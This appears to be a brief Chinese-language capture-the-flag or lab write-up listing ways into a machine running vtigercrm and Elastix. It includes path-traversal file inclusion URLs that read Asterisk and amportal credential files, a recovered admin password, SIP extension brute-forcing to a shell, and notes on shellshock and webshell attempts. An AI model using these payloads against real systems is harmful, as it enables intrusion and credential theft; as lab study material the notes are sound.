玩法非常多。
0、lfi-password
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf &module=Accounts&action
google 找到 elasxtic 配置文件位置。
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../../etc/asterisk/manager.conf &module=Accounts&action
登入应用。
admin/jEhdIekWmdjE
使用有效 cookie 通过上传漏洞(CVE-2015-6000)拿到 webshell。上传不成功
01、lfi-ssh root@10.10.10.7 拒绝访问
1、remote code injection
38091 利用不成功
18650 根据报错枚举爆破,得到 extension 233,getshell。涉及到两个工具,其机理和运用还没深入研究。遇到ssl报错的问题,已经解决。其实可以通过 bp 发包避开这个问题。
https://github.com/EnableSecurity/sipvicious
https://github.com/EnableSecurity/sipvicious/wiki/SVWar-Usage
2、lfi-email webshell
3、shellshock
没有回显,用 sleep 10,盲注原理。